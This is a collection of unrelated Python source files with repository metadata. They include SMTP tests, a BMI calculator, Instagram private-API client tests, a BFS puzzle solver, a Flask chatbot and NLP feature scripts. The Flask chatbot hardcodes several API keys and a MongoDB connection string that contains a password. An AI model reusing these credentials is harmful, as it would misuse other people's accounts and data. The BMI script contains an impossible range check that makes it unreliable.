res = sendmail(smtp, msg['From'], TO3, msg.as_string())
assert {} == res
# assumes smtp_max_recipient_count == 3
def test_filter_by_coverage_4_ok_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO4)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO4, msg.as_string())
assert code == 550
assert resp == 'Too many recipients specified'
def test_filter_by_coverage_2_bad_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2_BAD_COVERAGE)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2_BAD_COVERAGE, msg.as_string())
assert code == 550
assert resp == 'No valid recipients found'
# assumes invalid_recipient_policy == reject_message
def test_filter_by_coverage_2_ok_2_bad_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2 + TO2_BAD_COVERAGE)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2 + TO2_BAD_COVERAGE, msg.as_string())
assert code == 550
assert resp == 'Rejected by invalid recipient policy'
#
# Message content
#
# assumes max_msg_parts == 10
def test_10_msg_parts_succ(smtp):
msg = MIMEText('Very Long Message ' * 85)
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
# assumes max_msg_parts == 10
def test_11_msg_parts_fail(smtp):
msg = MIMEText('Very Long Message ' * 86)
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Too many SMS parts'
#
# Internal error
#
def test_internal_error_succ(smtp):
msg = MIMEText('internal error test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = '; '.join(TO2)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2, msg.as_string())
assert code == 554
assert resp == 'Internal server error'
|
[
"dm.klionsky@gmail.com"
] |
dm.klionsky@gmail.com
|
19bf5a6e61dce3b350f0d1e8f5096e10c43332a4
|
9c8e0321a4c3a6d072babc34b94a6101e1ea3d11
|
/main.py
|
7da6e1d614f163173724701adb57f161b8d2ae6d
|
[] |
no_license
|
sebekbr/bmi_calculator
|
1714b074c3afc45f61fa01a9e9adffa22bf33b74
|
dcf7f6c3f6011a82b797c2fc990aaa99688aca9e
|
refs/heads/master
| 2020-12-11T20:32:38.081179
| 2020-01-14T22:58:28
| 2020-01-14T22:58:28
| 233,952,247
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
print("KALKULATOR BMI")
print("~~~~~~~~~~~~~~")
print("Podaj wymagane dane. Pamiętaj aby zamiast przecinka (,) stosować kropkę (.)")
height = input("Podaj wzrost w [m]: ")
weight = input("Podaj wagę w [kg]: ")
# konwersja string do float
floatHeight = float(height)
floatWeight = float(weight)
bmi = floatWeight / (floatHeight * floatHeight)
print(round(bmi,2)) # round zaokrągla liczbę do dwóch miejsc
if bmi < 18.5:
print("Niedowaga!")
elif bmi > 18.5 and bmi < 24.99:
print("Waga normalna")
elif bmi > 25 and bmi < 29.99:
print("Nadwaga")
elif bmi > 30 and bmi < 34.99:
print("Otyłość 1 stopnia")
elif bmi > 35 and bmi < 34.99:
print("Otyłość 2 stopnia")
elif bmi > 40:
print("Otyłość 3 stopnia")
else:
print("Error!")
|
[
"sebastian.brodziak@gmail.com"
] |
sebastian.brodziak@gmail.com
|
5173078daff12784dc95130aa7fa752675945ff6
|
0fc95286ad73a7e9f2747f669d67057a5c7f1269
|
/tests/private/client.py
|
8511546470bb1403853176586d015028bd8f56b0
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
hideki-saito/instagram_private_api
|
d1105186dc620e9f1402d03e0bd829fcc0742eaa
|
3b394dfc183125a4dddd5e33345b49aa29a687fc
|
refs/heads/master
| 2021-01-21T21:06:14.461071
| 2017-06-13T15:08:10
| 2017-06-13T15:08:10
| 94,777,003
| 5
| 0
| null | 2017-06-19T12:59:08
| 2017-06-19T12:59:08
| null |
UTF-8
|
Python
| false
| false
| 9,394
|
py
|
from io import BytesIO
import json
from ..common import (
ApiTestBase, Client, ClientThrottledError, ClientError, ClientLoginRequiredError, Constants,
gen_user_breadcrumb, max_chunk_size_generator, max_chunk_count_generator,
compat_mock, compat_urllib_error
)
class ClientTests(ApiTestBase):
"""Tests for general Client functions (not endpoint specific)."""
@staticmethod
def init_all(api):
return [
{
'name': 'test_validate_useragent',
'test': ClientTests('test_validate_useragent', api)
},
{
'name': 'test_validate_useragent2',
'test': ClientTests('test_validate_useragent2', api)
},
{
'name': 'test_generate_useragent',
'test': ClientTests('test_generate_useragent', api)
},
{
'name': 'test_cookiejar_dump',
'test': ClientTests('test_cookiejar_dump', api)
},
{
'name': 'test_gen_user_breadcrumb',
'test': ClientTests('test_gen_user_breadcrumb', api)
},
{
'name': 'test_max_chunk_size_generator',
'test': ClientTests('test_max_chunk_size_generator', api)
},
{
'name': 'test_max_chunk_count_generator',
'test': ClientTests('test_max_chunk_count_generator', api)
},
{
'name': 'test_settings',
'test': ClientTests('test_settings', api)
},
{
'name': 'test_user_agent',
'test': ClientTests('test_user_agent', api)
},
{
'name': 'test_client_properties',
'test': ClientTests('test_client_properties', api)
},
{
'name': 'test_client_loginrequired',
'test': ClientTests('test_client_loginrequired', api)
},
{
'name': 'test_client_requests',
'test': ClientTests('test_client_requests', api)
},
]
def test_validate_useragent(self):
self.sleep_interval = 0
ua = 'Instagram 9.2.0 Android (22/5.1.1; 480dpi; 1080x1920; Xiaomi; Redmi Note 3; kenzo; qcom; en_GB)'
results = Client.validate_useragent(ua)
self.assertEqual(results['parsed_params']['brand'], 'Xiaomi')
self.assertEqual(results['parsed_params']['device'], 'Redmi Note 3')
self.assertEqual(results['parsed_params']['model'], 'kenzo')
self.assertEqual(results['parsed_params']['resolution'], '1080x1920')
self.assertEqual(results['parsed_params']['dpi'], '480dpi')
self.assertEqual(results['parsed_params']['chipset'], 'qcom')
self.assertEqual(results['parsed_params']['android_version'], 22)
self.assertEqual(results['parsed_params']['android_release'], '5.1.1')
self.assertEqual(results['parsed_params']['app_version'], '9.2.0')
def test_validate_useragent2(self):
self.sleep_interval = 0
ua = 'Instagram 9.2.0 Android (xx/5.1.1; 480dpi; 1080x1920; Xiaomi; Redmi Note 3; kenzo; qcom; en_GB)'
with self.assertRaises(ValueError):
Client.validate_useragent(ua)
def test_generate_useragent(self):
self.sleep_interval = 0
custom_device = {
'manufacturer': 'Samsung',
'model': 'maguro',
'device': 'Galaxy Nexus',
'android_release': '4.3',
'android_version': 18,
'dpi': '320dpi',
'resolution': '720x1280',
'chipset': 'qcom'
}
custom_ua = Client.generate_useragent(
android_release=custom_device['android_release'],
android_version=custom_device['android_version'],
phone_manufacturer=custom_device['manufacturer'],
phone_device=custom_device['device'],
phone_model=custom_device['model'],
phone_dpi=custom_device['dpi'],
phone_resolution=custom_device['resolution'],
phone_chipset=custom_device['chipset']
)
self.assertEqual(
custom_ua,
'Instagram %s Android (%s/%s; %s; %s; '
'%s; %s; %s; %s; en_US)'
% (
Constants.APP_VERSION,
custom_device['android_version'],
custom_device['android_release'],
custom_device['dpi'],
custom_device['resolution'],
custom_device['manufacturer'],
custom_device['device'],
custom_device['model'],
custom_device['chipset'],
)
)
def test_cookiejar_dump(self):
self.sleep_interval = 0
dump = self.api.cookie_jar.dump()
self.assertIsNotNone(dump)
def test_gen_user_breadcrumb(self):
self.sleep_interval = 0
output = gen_user_breadcrumb(15)
self.assertIsNotNone(output)
def test_max_chunk_size_generator(self):
self.sleep_interval = 0
chunk_data = 'abcdefghijklmnopqrstuvwxyz'
chunk_size = 5
chunk_count = 0
for chunk_info, data in max_chunk_size_generator(chunk_size, chunk_data):
chunk_count += 1
self.assertIsNotNone(data, 'Empty chunk.')
self.assertLessEqual(len(data), chunk_size, 'Chunk size is too big.')
self.assertEqual(len(data), chunk_info.length, 'Chunk length is wrong.')
self.assertEqual(chunk_info.is_first, chunk_count == 1)
def test_max_chunk_count_generator(self):
self.sleep_interval = 0
chunk_data = 'abcdefghijklmnopqrstuvwxyz'
expected_chunk_count = 5
chunk_count = 0
for chunk_info, data in max_chunk_count_generator(expected_chunk_count, chunk_data):
chunk_count += 1
self.assertIsNotNone(data, 'Empty chunk.')
self.assertEqual(len(data), chunk_info.length, 'Chunk length is wrong.')
self.assertEqual(chunk_info.is_first, chunk_count == 1)
self.assertEqual(chunk_info.is_last, chunk_count == expected_chunk_count)
self.assertEqual(chunk_count, expected_chunk_count, 'Chunk count is wrong.')
def test_settings(self):
self.sleep_interval = 0
results = self.api.settings
for k in ('uuid', 'device_id', 'ad_id', 'cookie', 'created_ts'):
self.assertIsNotNone(results.get(k))
def test_user_agent(self):
self.sleep_interval = 0
ua = self.api.user_agent
self.assertIsNotNone(ua)
self.api.user_agent = ua
def test_ua_setter():
self.api.user_agent = 'Agent X'
self.assertRaises(ValueError, test_ua_setter)
custom_ua = self.api.generate_useragent(phone_manufacturer='BrandX')
self.assertTrue('BrandX' in custom_ua)
results = self.api.validate_useragent(custom_ua)
self.assertEqual(results['parsed_params']['brand'], 'BrandX')
def test_client_properties(self):
self.sleep_interval = 0
results = self.api.get_cookie_value('non-existent-cookie-value')
self.assertIsNone(results)
self.assertIsNotNone(self.api.csrftoken)
self.assertIsNotNone(self.api.token)
self.assertIsNotNone(self.api.authenticated_user_id)
self.assertIsNotNone(self.api.authenticated_user_name)
self.assertIsNotNone(self.api.rank_token)
self.assertIsNotNone(self.api.phone_id)
self.assertIsNotNone(self.api.radio_type)
self.assertIsNotNone(self.api.generate_deviceid())
self.assertIsInstance(self.api.timezone_offset, int)
def test_client_loginrequired(self):
self.sleep_interval = 0
with self.assertRaises(ClientLoginRequiredError):
Client('', '')
@compat_mock.patch('instagram_private_api.client.compat_urllib_request.OpenerDirector.open')
def test_client_requests(self, open_mock):
self.sleep_interval = 0
open_mock.side_effect = [
compat_urllib_error.HTTPError(
'', 400, 'Bad Request', {},
BytesIO(json.dumps({'status': 'fail', 'message': 'login_required'}).encode('ascii'))),
compat_urllib_error.HTTPError(
'', 429, 'Too Many Requests', {},
BytesIO(
json.dumps({
'status': 'fail',
'message': 'Sorry, too many requests. Please try again later.'}
).encode('ascii')
)),
compat_urllib_error.HTTPError(
'', 500, 'Internal Server Error', {},
BytesIO('Internal Server Error'.encode('ascii'))),
]
with self.assertRaises(ClientLoginRequiredError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'login_required')
with self.assertRaises(ClientThrottledError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'Sorry, too many requests. Please try again later.')
with self.assertRaises(ClientError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'Internal Server Error')
|
[
"lastmodified@gmail.com"
] |
lastmodified@gmail.com
|
a3853066e56c3628542df630bc034da0c0909f0e
|
149660428ec7570b02b9e8b3d494dcd548e80005
|
/01-04_python基础/02_branch/hm_06_holiday_of_girlfrieds.py
|
04fdf021fc6b462b2d0aa25d6ca816e1270e5888
|
[] |
no_license
|
kenzzuli/hm_15
|
603eb178e476f946eb57b1cdf0c85ba5d65e8d58
|
db8a6d13776e55aa4e05ff9f39e9c8e98d59d8ee
|
refs/heads/master
| 2023-08-07T01:57:01.993474
| 2021-09-23T15:49:19
| 2021-09-23T15:49:19
| 359,322,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
"""
1. 定义 `holiday_name` 字符串变量记录节日名称
2. 如果是 **情人节** 应该 **买玫瑰**/**看电影**
3. 如果是 **平安夜** 应该 **买苹果**/**吃大餐**
4. 如果是 **生日** 应该 **买蛋糕**
5. 其他的日子每天都是节日啊……
"""
holiday_name = input("please input a holiday:")
if holiday_name == "valentine's day":
print("buy roses")
elif holiday_name == "holloween eve":
print("buy apple")
elif holiday_name == "birthday":
print("buy cake")
else:
print("everyday is a holiday with her")
|
[
"820710063@qq.com"
] |
820710063@qq.com
|
9c3ee945c6fece715afb3662a97ce6713662f1dc
|
0f9888879a1d7b23d51bbca539be94ce26e37360
|
/lab5/n_queen_bfs.py
|
4adb7481ff6d253e1da1e8fe2b23bf8f9903e369
|
[] |
no_license
|
singhpratyush/intro-to-ai
|
034ad69ab3a4dd6ea848d582e06cfd53c2962187
|
04eb3236147e882a3c666fe7f3425e15086fbb23
|
refs/heads/master
| 2021-01-19T22:08:40.256641
| 2017-04-19T19:05:27
| 2017-04-19T19:05:27
| 88,758,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,504
|
py
|
import numpy
import sys
sys.path.append('.')
from Lab5.bfs import BreadthFirstSearch
class NQueenBFS(BreadthFirstSearch):
def __init__(self, n):
super().__init__()
self.n = n
self.dim = [n, n]
def is_final(self, node):
node = numpy.array(node).reshape(self.dim)
if sum(node.diagonal()) > 1:
return False
for i in range(self.n):
if sum(node[:, i]) > 1:
return False
if sum(node[i, :]) > 1:
return False
return True
def get_adjacent(self, node):
node = numpy.array(node).reshape(self.dim)
queen_pos = numpy.where(node == 1)
for i in range(self.n):
curr_queen = queen_pos[0][i], queen_pos[1][i]
# Left
if curr_queen[0] - 1 >= 0:
temp = node.copy()
new = curr_queen[0] - 1, curr_queen[1]
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Left-Bottom
if curr_queen[0] - 1 >= 0 and curr_queen[1] + 1 < self.n:
temp = node.copy()
new = curr_queen[0] - 1, curr_queen[1] + 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Bottom
if curr_queen[1] + 1 < self.n:
temp = node.copy()
new = curr_queen[0], curr_queen[1] + 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Right-Bottom
if curr_queen[0] + 1 < self.n and curr_queen[1] + 1 < self.n:
temp = node.copy()
new = curr_queen[0] + 1, curr_queen[1] + 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Right
if curr_queen[0] + 1 < self.n:
temp = node.copy()
new = curr_queen[0] + 1, curr_queen[1]
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Right-Top
if curr_queen[0] + 1 < self.n and curr_queen[1] - 1 >= 0:
temp = node.copy()
new = curr_queen[0] + 1, curr_queen[1] - 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Top
if curr_queen[1] - 1 >= 0:
temp = node.copy()
new = curr_queen[0], curr_queen[1] - 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
# Left-Top
if curr_queen[0] - 1 >= 0 and curr_queen[1] - 1 >= 0:
temp = node.copy()
new = curr_queen[0] - 1, curr_queen[1] - 1
if node[new] == 0:
temp[curr_queen], temp[new] = 0, 1
yield tuple(temp.ravel().tolist())
def main():
n = 5
nqp = NQueenBFS(n)
root = tuple([1]*n + [0]*(n-1)*n)
nqp.add_node(root)
result = nqp.traverse()
print(result[0])
print(result[2])
if __name__ == '__main__':
main()
|
[
"singh.pratyush96@gmail.com"
] |
singh.pratyush96@gmail.com
|
075d3a7bd30b85a1f1308e0e2336175b386a5fd9
|
ab31559f47b62bda09acf06c62beef4e5c0c546a
|
/app.py
|
843ea54ab77eded8e42228f89fb5e51372841cee
|
[] |
no_license
|
saikumar1752/Chatbot1752
|
737a0f4616edde31ee4747b8876f36e06c2baaa8
|
058298f44b4b9df496e54d40a5aacee3cee48e2a
|
refs/heads/main
| 2023-05-08T05:49:54.421878
| 2021-05-22T04:58:47
| 2021-05-22T04:58:47
| 369,306,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,785
|
py
|
import random
import json
import pprint
import nlpcloud
from pymongo import MongoClient
from flask import Flask, jsonify, request
from flask_cors import CORS, cross_origin
app=Flask(__name__)
CORS(app, support_credentials=True)
nlpapis=[
"2df4083aa8e71c45a1913a6abee1b5e443dbfdbc",
"66f926e21f3160c7c917d9d4ef312947250284b6",
"8833df5d4ff304cf054bbb88b0f767e3ca79c8ba",
"537843dc93cf606b3f52e1fd34ef898965811ae1",
"1b4c8ca0c19046a56cd1301324a0c6bb278727ed",
"573a02b5e157fb2c5f50eb2a0e1480650da65d4b"
]
length=len(nlpapis)
nlpclients=[]
for x in nlpapis:
nlpclients.append(nlpcloud.Client("roberta-base-squad2", x))
client = MongoClient("mongodb+srv://abhisekkumar:passcode23@internproject-zscmu.mongodb.net/Airbus?retryWrites=true&w=majority")
db=client.ChatbotMessages.Messages
count=0
@app.route("/", methods=["GET", "POST"])
@cross_origin(supports_credentials=True)
def hello_world():
global count
store=nlpclients[count]
count=(count+1)%length
lol=request.data.decode('UTF-8')
obj=json.loads(lol)
question=obj['message']
subjects=db.find()
answers=[]
store_content=[]
for x in subjects:
if "question" in x :
if question==x["question"]:
return jsonify(fulfillmentText=x['answer'])
elif "content" in x:
store_content.append(x["content"])
for x in store_content:
nplmessage=store.question(x, question)
answers.append([nplmessage["answer"], nplmessage["score"]])
answers.sort(reverse=True, key=lambda x :x[1])
if answers[0][1]<0.3:
answer=db.find({"dummy":"true"})
store=[]
for x in answer:
store.append(x["message"])
store=store[0]
return jsonify(fulfillmentText=store)
return jsonify(fulfillmentText=answers[0][0])
if __name__=='__main__':
app.run(debug=True)
|
[
"noreply@github.com"
] |
saikumar1752.noreply@github.com
|
35bcd44d6c3ffc36f3c53e1a5856f2b17256a861
|
2780b5d138af6733a20913baaeebc0c4f235cbee
|
/bikeax/wsgi.py
|
869504948d4e574fa4c9c639af5e372d88445279
|
[] |
no_license
|
ccsreenidhin/Django-Ecom
|
b74c47345bd883aa41d35ddc5cc4bc8da4270999
|
b27a42cecf91ae8f3f4ccb0e07717be6a6c98ba5
|
refs/heads/master
| 2022-10-24T02:20:58.059523
| 2017-10-07T18:17:10
| 2020-06-13T05:48:47
| 271,949,105
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
WSGI config for bikeax project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bikeax.settings")
application = get_wsgi_application()
|
[
"ccsreenidhin@gmail.com"
] |
ccsreenidhin@gmail.com
|
f013cb70fc081f157e67c61bab659847bfe58297
|
8160376d2aba1e70d81d7b1465e1aaabe6ee304b
|
/code/test_features.py
|
eb70c5bbf5cdc336749c472ed988c6e88ad0fda4
|
[] |
no_license
|
UtkarshVIT/independentstudy
|
a6c2ae417fd0bf7b7f86d60a0338627b79b15b95
|
ace3329f2f8f7a75b4e40ee053b6ec234f695b44
|
refs/heads/master
| 2020-05-02T08:47:42.044123
| 2019-04-25T21:00:43
| 2019-04-25T21:00:43
| 177,851,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,234
|
py
|
import nltk
import csv
import io
from string import digits
from nltk.sentiment.vader import SentimentIntensityAnalyzer
import matplotlib
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import TfidfVectorizer
import sys
from collections import Counter
from decimal import *
import pandas as pd
import numpy
getcontext().prec = 3
reload(sys)
sys.setdefaultencoding('utf8')
sid = SentimentIntensityAnalyzer()
sen_list_with_problem = list()
sen_list_without_problem = list()
'''
with io.open('train_set.csv', encoding='utf8', errors='ignore') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
if row[2] == '1':
sen_list_with_problem.append(''.join(x for x in row[0] if x.isalpha() or x ==' '))
elif row[2] == '-1':
sen_list_without_problem.append(''.join(x for x in row[0] if x.isalpha() or x ==' '))
'''
def getSentimentScore(sentence, senti):
temp = sentence.split('.')
count_temp = 0.0
for sen in temp:
count_temp += sid.polarity_scores(sen)[senti]
print count_temp/len(temp)
return count_temp/len(temp)
list1 = list()
list2 = list()
vectorizer = 2
X = 2
def createTfIDFFeature(list1, list2):
global vectorizer
global X
doc1 = ' '.join(list1)
doc2 = ' '.join(list2)
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform([doc1, doc2])
def getIndex(word_test):
global vectorizer
global X
index = 0
for word in vectorizer.get_feature_names():
if word == word_test:
return index
index += 1
return -1
def getSenScore(sen):
global vectorizer
global X
score_class1 = 0
score_class2 = 0
for word in sen.split(' '):
index = getIndex(word)
if index != -1:
score_class1 += X[0, index]
score_class2 += X[1, index]
return [score_class1, score_class2]
#createTfIDFFeature(sen_list_with_problem, sen_list_without_problem)
#df = pd.read_csv("train_set2.csv")
def createScores():
df = pd.read_csv("train_set3.csv")
for i in range(0, df.shape[0]):
print 'done' + str(i) + "/" + str(df.shape[0])
sen = ''.join(x for x in df.comments[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
df.NN[i] = round(NN_count/tot, 2)
df.RB[i] = round(VB_count/tot, 2)
df.VB[i] = round(AD_count/tot, 2)
df.JJ[i] = round(ADV_count/tot, 2)
df.to_csv('train_set4.csv', index=False)
createScores()
def cor_test():
for i in range(0, df.shape[0]):
#for i in range(0, 5):
print 'done: ' + str(i) + '/' + str(df.shape[0])
df.neg_senti[i] = getSentimentScore(df.comments[i], 'neg')
df.pos_senti[i] = getSentimentScore(df.comments[i], 'pos')
res = getSenScore(df.comments[i])
df.tf_score[i] = -1 if res[0]< res[1] else 1
df.to_csv('train_set2.csv', index=False)
res = 0.0
cor_res = 0.0
for i in range(0, df.shape[0]):
if df.tf_score[i].astype(numpy.int64) == df.value[i]:
cor_res += 1.0
res += 1.0
print cor_res/res, res, cor_res
'''
check = 0
ls = []
for i in range(0, df.shape[0]):
if df.value[i] == numpy.int64(check):
ls.append(i)
print ls
df = df.drop(df.index[ls])
df.to_csv('train_set3.csv', index=False)
df = pd.read_csv("train_set3.csv")
ls = []
for i in range(0, df.shape[0]):
if df.value[i] == numpy.int64(check):
ls.append(i)
print ls
'''
'''
check = 0
print type(check), type(numpy.int64(check)), type(df.value[0]), numpy.int64(check), df.value[0]
df[df.value != numpy.int64(check)]
df.to_csv('train_set3.csv', index=False)
'''
'''
def test_classifier():
global vectorizer
global X
tot_count = 0.0
corr_count = 0.0
with io.open('expertiza_new_clean_data_test_set.csv', encoding='utf8', errors='ignore') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
if row[2] != 0:
sen = ''.join(x for x in row[0] if x.isalpha() or x ==' ')
tot_count += 1.0
res = getSenScore(sen)
final_res = -1 if res[0]< res[1] else 1
print final_res, row[2]
if str(final_res) == row[2]:
corr_count += 1.0
print 'Final Result: ', corr_count/tot_count
'''
def sentimentScoreAttributeAnalysis():
ans1 = 0
ans2 = 0
for i in range(0, len(sen_list_with_problem)):
temp = sen_list_with_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['neg']
ans1 += count_temp/len(temp)
list1.append(count_temp)
plt.scatter([0 for i in range(0, len(list1))], list1, color = "blue", label='with problems')
for i in range(0, len(sen_list_without_problem)):
temp = sen_list_without_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['neg']
ans2 += count_temp/len(temp)
list2.append(count_temp)
plt.scatter([0.2 for i in range(0, len(list2))], list2, color = "red", label='without problems')
print "Mean NEG value for Sen with problems: ", ans1/len(sen_list_with_problem)
print "Mean NEG value for Sen without problems: ", ans2/len(sen_list_without_problem)
ans1 = 0
ans2 = 0
for i in range(0, len(sen_list_with_problem)):
temp = sen_list_with_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['pos']
ans1 += count_temp/len(temp)
list1.append(count_temp)
plt.scatter([2 for i in range(0, len(list1))], list1, color = "blue")
for i in range(0, len(sen_list_without_problem)):
temp = sen_list_without_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['pos']
ans2 += count_temp/len(temp)
list2.append(count_temp)
plt.scatter([2.2 for i in range(0, len(list2))], list2, color = "red")
plt.legend(loc='upper right')
plt.show()
print "Mean POS value for Sen with problems: ", ans1/len(sen_list_with_problem)
print "Mean POS value for Sen without problems: ", ans2/len(sen_list_without_problem)
#sentimentScoreAttributeAnalysis()
'''
def getWordTypeCout():
NN = []
VB = []
AD = []
ADV = []
for i in range(0, len(sen_list_with_problem)):
sen_comment = ''.join(x for x in sen_list_with_problem[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen_comment.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
NN.append(NN_count/tot);VB.append(VB_count/tot);AD.append(AD_count/tot);ADV.append(ADV_count/tot)
ls1 = [round(x, 2) for x in NN]
ls2= [round(x, 2) for x in VB]
ls3= [round(x, 2) for x in AD]
ls4= [round(x, 2) for x in ADV]
plt.scatter([0 for i in range(0, len(ls1))], ls1, color = "blue", label='with problems')
plt.scatter([1 for i in range(0, len(ls2))], ls2, color = "blue")
plt.scatter([2 for i in range(0, len(ls3))], ls3, color = "blue")
plt.scatter([3 for i in range(0, len(ls4))], ls4, color = "blue")
NN = []
VB = []
AD = []
ADV = []
for i in range(0, len(sen_list_without_problem)):
sen_comment = ''.join(x for x in sen_list_without_problem[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen_comment.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
NN.append(NN_count/tot);VB.append(VB_count/tot);AD.append(AD_count/tot);ADV.append(ADV_count/tot)
ls1 = [round(x, 2) for x in NN]
ls2 = [round(x, 2) for x in VB]
ls3 = [round(x, 2) for x in AD]
ls4 = [round(x, 2) for x in ADV]
plt.scatter([0.1 for i in range(0, len(ls1))], ls1, color = "red", label='wihout problems')
plt.scatter([1.1 for i in range(0, len(ls2))], ls2, color = "red")
plt.scatter([2.1 for i in range(0, len(ls3))], ls3, color = "red")
plt.scatter([3.1 for i in range(0, len(ls4))], ls4, color = "red")
plt.legend(loc='upper right')
plt.show()
getWordTypeCout()
'''
|
[
"utkarshsharma351@gmail.com"
] |
utkarshsharma351@gmail.com
|
b242e795afaf110f82c6adb7c06931cff33ad7e3
|
a7acc0c80a2588c41646a40c1238d1622013cafd
|
/rectlabel_create_pascal_tf_record.py
|
eb4c1d2f38a63826f5d494c8bb250662e4236e09
|
[] |
no_license
|
3rdTools/Rectlabel-support
|
10ebea95211a8b561df16db2e4a55bc4ff3a9cb2
|
d07129be5eb8f713a457927264440c4082284de7
|
refs/heads/master
| 2020-04-22T15:07:53.743288
| 2019-02-12T13:25:18
| 2019-02-12T13:25:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,365
|
py
|
r"""
python object_detection/dataset_tools/rectlabel_create_pascal_tf_record.py \
--images_dir="${IMAGES_DIR}" \
--image_list_path="${IMAGE_LIST_PATH}" \
--label_map_path="${LABEL_MAP_PATH}" \
--output_path="${OUTPUT_PATH}" \
--include_masks
"""
import hashlib
import io
import os
import glob
import random
from pprint import pprint
from lxml import etree
import numpy as np
np.set_printoptions(threshold=np.nan)
import PIL.Image
import tensorflow as tf
from object_detection.utils import dataset_util
from object_detection.utils import label_map_util
flags = tf.app.flags
flags.DEFINE_string('images_dir', '', 'Full path to the images directory.')
flags.DEFINE_string('image_list_path', 'train.txt', 'Path to image list text file.')
flags.DEFINE_string('annotations_dir', 'annotations', 'Relative path to annotations directory.')
